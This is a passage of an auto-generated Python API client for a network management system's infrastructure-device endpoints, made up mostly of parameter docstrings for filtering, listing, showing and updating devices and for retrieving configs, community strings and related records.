:param op_cap_net_deprovisioning_ind: The operator to apply to the field cap_net_deprovisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_deprovisioning_ind: Capability of de-provisioning a network from this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_deprovisioning_ind: If op_cap_net_deprovisioning_ind is specified, the field named in this input will be compared to the value in cap_net_deprovisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_deprovisioning_ind must be specified if op_cap_net_deprovisioning_ind is specified.
:type val_f_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_deprovisioning_ind: If op_cap_net_deprovisioning_ind is specified, this value will be compared to the value in cap_net_deprovisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_deprovisioning_ind must be specified if op_cap_net_deprovisioning_ind is specified.
:type val_c_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_deprovisioning_na_reason: The operator to apply to the field cap_net_deprovisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_deprovisioning_na_reason: Reason of non ability of de-provisioning a network from this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_deprovisioning_na_reason: If op_cap_net_deprovisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_deprovisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_deprovisioning_na_reason must be specified if op_cap_net_deprovisioning_na_reason is specified.
:type val_f_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_deprovisioning_na_reason: If op_cap_net_deprovisioning_na_reason is specified, this value will be compared to the value in cap_net_deprovisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_deprovisioning_na_reason must be specified if op_cap_net_deprovisioning_na_reason is specified.
:type val_c_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_provisioning_ind: The operator to apply to the field cap_net_provisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_provisioning_ind: Capability of provisioning a network on an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_provisioning_ind: If op_cap_net_provisioning_ind is specified, the field named in this input will be compared to the value in cap_net_provisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_provisioning_ind must be specified if op_cap_net_provisioning_ind is specified.
:type val_f_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_provisioning_ind: If op_cap_net_provisioning_ind is specified, this value will be compared to the value in cap_net_provisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_provisioning_ind must be specified if op_cap_net_provisioning_ind is specified.
:type val_c_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_provisioning_na_reason: The operator to apply to the field cap_net_provisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_provisioning_na_reason: Reason of non ability of provisioning a network on an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_provisioning_na_reason: If op_cap_net_provisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_provisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_provisioning_na_reason must be specified if op_cap_net_provisioning_na_reason is specified.
:type val_f_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_provisioning_na_reason: If op_cap_net_provisioning_na_reason is specified, this value will be compared to the value in cap_net_provisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_provisioning_na_reason must be specified if op_cap_net_provisioning_na_reason is specified.
:type val_c_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_vlan_provisioning_ind: The operator to apply to the field cap_net_vlan_provisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_vlan_provisioning_ind: Capability of creating a VLAN and provision a netowrk on its virtual interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_vlan_provisioning_ind: If op_cap_net_vlan_provisioning_ind is specified, the field named in this input will be compared to the value in cap_net_vlan_provisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_vlan_provisioning_ind must be specified if op_cap_net_vlan_provisioning_ind is specified.
:type val_f_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_vlan_provisioning_ind: If op_cap_net_vlan_provisioning_ind is specified, this value will be compared to the value in cap_net_vlan_provisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_vlan_provisioning_ind must be specified if op_cap_net_vlan_provisioning_ind is specified.
:type val_c_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_vlan_provisioning_na_reason: The operator to apply to the field cap_net_vlan_provisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_vlan_provisioning_na_reason: Reason of non ability of creating a VLAN and provision a netowrk on its virtual interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_vlan_provisioning_na_reason: If op_cap_net_vlan_provisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_vlan_provisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_vlan_provisioning_na_reason must be specified if op_cap_net_vlan_provisioning_na_reason is specified.
:type val_f_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_vlan_provisioning_na_reason: If op_cap_net_vlan_provisioning_na_reason is specified, this value will be compared to the value in cap_net_vlan_provisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_vlan_provisioning_na_reason must be specified if op_cap_net_vlan_provisioning_na_reason is specified.
:type val_c_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_vlan_assignment_ind: The operator to apply to the field cap_vlan_assignment_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_vlan_assignment_ind: Capability of assigning a regular data VLAN to an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_vlan_assignment_ind: If op_cap_vlan_assignment_ind is specified, the field named in this input will be compared to the value in cap_vlan_assignment_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_vlan_assignment_ind must be specified if op_cap_vlan_assignment_ind is specified.
:type val_f_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_vlan_assignment_ind: If op_cap_vlan_assignment_ind is specified, this value will be compared to the value in cap_vlan_assignment_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_vlan_assignment_ind must be specified if op_cap_vlan_assignment_ind is specified.
:type val_c_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_vlan_assignment_na_reason: The operator to apply to the field cap_vlan_assignment_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_vlan_assignment_na_reason: Reason of non ability of assigning a regular data VLAN to an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_vlan_assignment_na_reason: If op_cap_vlan_assignment_na_reason is specified, the field named in this input will be compared to the value in cap_vlan_assignment_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_vlan_assignment_na_reason must be specified if op_cap_vlan_assignment_na_reason is specified.
:type val_f_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_vlan_assignment_na_reason: If op_cap_vlan_assignment_na_reason is specified, this value will be compared to the value in cap_vlan_assignment_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_vlan_assignment_na_reason must be specified if op_cap_vlan_assignment_na_reason is specified.
:type val_c_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_voice_vlan_ind: The operator to apply to the field cap_voice_vlan_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_voice_vlan_ind: Capability of assigning a voice VLAN to an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_voice_vlan_ind: If op_cap_voice_vlan_ind is specified, the field named in this input will be compared to the value in cap_voice_vlan_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_voice_vlan_ind must be specified if op_cap_voice_vlan_ind is specified.
:type val_f_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_voice_vlan_ind: If op_cap_voice_vlan_ind is specified, this value will be compared to the value in cap_voice_vlan_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_voice_vlan_ind must be specified if op_cap_voice_vlan_ind is specified.
:type val_c_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_voice_vlan_na_reason: The operator to apply to the field cap_voice_vlan_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_voice_vlan_na_reason: Reason of non ability of assigning a voice VLAN to an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_voice_vlan_na_reason: If op_cap_voice_vlan_na_reason is specified, the field named in this input will be compared to the value in cap_voice_vlan_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_voice_vlan_na_reason must be specified if op_cap_voice_vlan_na_reason is specified.
:type val_f_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_voice_vlan_na_reason: If op_cap_voice_vlan_na_reason is specified, this value will be compared to the value in cap_voice_vlan_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_voice_vlan_na_reason must be specified if op_cap_voice_vlan_na_reason is specified.
:type val_c_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_chassis_serial_number: The operator to apply to the field chassis_serial_number. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. chassis_serial_number: The combined comma separated serial numbers reported by the chassis snmp MIB. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_chassis_serial_number: If op_chassis_serial_number is specified, the field named in this input will be compared to the value in chassis_serial_number using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_chassis_serial_number must be specified if op_chassis_serial_number is specified.
:type val_f_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_chassis_serial_number: If op_chassis_serial_number is specified, this value will be compared to the value in chassis_serial_number using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_chassis_serial_number must be specified if op_chassis_serial_number is specified.
:type val_c_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_privileged_polling: The operator to apply to the field privileged_polling. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. privileged_polling: A flag indicating whether to poll the device in privileged mode. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_privileged_polling: If op_privileged_polling is specified, the field named in this input will be compared to the value in privileged_polling using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_privileged_polling must be specified if op_privileged_polling is specified.
:type val_f_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_privileged_polling: If op_privileged_polling is specified, this value will be compared to the value in privileged_polling using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_privileged_polling must be specified if op_privileged_polling is specified.
:type val_c_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysDescr: The operator to apply to the field rawSysDescr. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysDescr: Unprocessed Device Description value as returned by SNMP For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysDescr: If op_rawSysDescr is specified, the field named in this input will be compared to the value in rawSysDescr using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysDescr must be specified if op_rawSysDescr is specified.
:type val_f_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysDescr: If op_rawSysDescr is specified, this value will be compared to the value in rawSysDescr using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysDescr must be specified if op_rawSysDescr is specified.
:type val_c_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysModel: The operator to apply to the field rawSysModel. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysModel: Unprocessed Device Model value as returned by SNMP For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysModel: If op_rawSysModel is specified, the field named in this input will be compared to the value in rawSysModel using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysModel must be specified if op_rawSysModel is specified.
:type val_f_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysModel: If op_rawSysModel is specified, this value will be compared to the value in rawSysModel using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysModel must be specified if op_rawSysModel is specified.
:type val_c_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysVersion: The operator to apply to the field rawSysVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysVersion: Unprocessed Device Version value as returned by SNMP For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysVersion: If op_rawSysVersion is specified, the field named in this input will be compared to the value in rawSysVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysVersion must be specified if op_rawSysVersion is specified.
:type val_f_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysVersion: If op_rawSysVersion is specified, this value will be compared to the value in rawSysVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysVersion must be specified if op_rawSysVersion is specified.
:type val_c_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified infra device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_device: The infra device identified by the specified DeviceID.
:rtype infra_device: InfraDevice
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def update(self, **kwargs):
"""Updates an existing infra device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the updated infra device.
:rtype id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model: The class name of the updated infra device.
:rtype model: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return uri: A URI that may be used to retrieve the updated infra device.
:rtype uri: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_device: The updated infra device.
:rtype infra_device: InfraDevice
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def running_config_text(self, **kwargs):
"""The contents of the newest saved running config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The contents of the newest saved running config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("running_config_text"), kwargs)
def saved_config_text(self, **kwargs):
"""The contents of the newest saved startup config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The contents of the newest saved startup config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("saved_config_text"), kwargs)
def DeviceCommunity(self, **kwargs):
"""The community string.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The community string.
:rtype : String
"""
return self.api_request(self._get_method_fullname("DeviceCommunity"), kwargs)
def chassis_serial_number(self, **kwargs):
"""The combined comma separated serial numbers reported by the chassis snmp MIB.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The combined comma separated serial numbers reported by the chassis snmp MIB.
:rtype : String
"""
return self.api_request(self._get_method_fullname("chassis_serial_number"), kwargs)
def available_mgmt_ips(self, **kwargs):
"""Available Management IPs for a device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Available Management IPs for a device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("available_mgmt_ips"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def parent_device(self, **kwargs):
"""The device containing this virtual device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing this virtual device.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("parent_device"), kwargs)
def gateway_device(self, **kwargs):
"""Returns the default gateway router for this device, based on the following in order of preference: device routing table, device configuration file, device subnet and common conventions.
